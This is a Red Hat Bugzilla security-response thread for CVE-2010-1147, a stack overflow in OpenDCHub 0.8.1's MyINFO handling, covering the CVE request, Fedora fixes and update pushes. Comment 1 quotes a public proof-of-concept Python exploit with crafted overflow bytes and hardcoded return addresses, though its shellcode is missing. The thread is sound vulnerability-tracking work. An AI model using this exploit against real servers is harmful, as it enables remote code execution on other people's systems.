Bug 579206 (CVE-2010-1147) - CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Summary: CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafte...
Status: NEW
Alias: CVE-2010-1147
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: http://www.indahax.com/exploits/opend...
Whiteboard: impact=moderate,source=debian,reporte...
Keywords: Security
Depends On: 579207
TreeView+ depends on / blocked
Reported: 2010-04-03 09:11 UTC by Jan Lieskovsky
Modified: 2019-06-08 12:58 UTC (History)
1 user (show)

Clone Of:
Last Closed:

Attachments (Terms of Use)

Description Jan Lieskovsky 2010-04-03 09:11:37 UTC
Pierre Nogues found a stack overflow flaw, in the way Open DC Hub
sanitized content of user's MyINFO message. Remote attacker, 
with valid Open DC Hub account, could send a specially-crafted
MyINFO message to another user / all users connected to particular
Direct Connect network, leading into denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1

Comment 1 Jan Lieskovsky 2010-04-03 09:13:08 UTC
Public PoCs by Pierre posted in [1]:

# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
# Description:
#     OpenDcHub is a direct connect hub for Linux
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
# Affected versions :
#     OpenDcHub 0.8.1
# Plateforms :
#     Unix
# Usage :
#     ./exploit.py
import socket
host = ''
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
hax="$MyINFO $ALL joseph "
for i in range(103 - len(shellcode)):
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
# V2
# more complex version working too, it have more space for the shellcode
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time

Comment 2 Jan Lieskovsky 2010-04-03 09:14:30 UTC
This issue affects the versions of the opendchub package,
as shipped with Fedora releases of 11 and 12.

Please fix.

Comment 4 Jan Lieskovsky 2010-04-06 07:40:05 UTC
This is CVE-2010-1147.

Comment 5 Roshan Singh 2010-04-08 17:56:51 UTC
I have fixed the bug, and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM ?

Comment 6 Jan Lieskovsky 2010-04-08 18:13:58 UTC
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (some further
guide information is available also here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, by submitting request to Bodhi, be sure to 
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) within the "Bugs Fixed"

Thanks && Regards, Jan.
Jan iankko Lieskovsky / Red Hat Security Response Team

Comment 7 Fedora Update System 2010-04-08 18:29:28 UTC
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.

Comment 8 Fedora Update System 2010-04-08 18:30:31 UTC
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.

Comment 9 Fedora Update System 2010-04-08 18:31:49 UTC
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.

Comment 10 Roshan Singh 2010-04-09 04:26:58 UTC
I have deleted these updates, I had uploaded the wrong tar ball to sourceforge, luckily nobody had downloaded it till then, I will update the RPM by today.

I am sorry for the inconvenience.

Comment 11 Fedora Update System 2010-04-10 17:25:09 UTC
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.

Comment 12 Fedora Update System 2010-04-10 17:25:13 UTC
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.

Comment 13 Fedora Update System 2010-04-10 17:25:17 UTC
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.

Comment 14 Fedora Update System 2010-04-30 17:10:57 UTC
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 15 Fedora Update System 2010-04-30 17:18:50 UTC
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.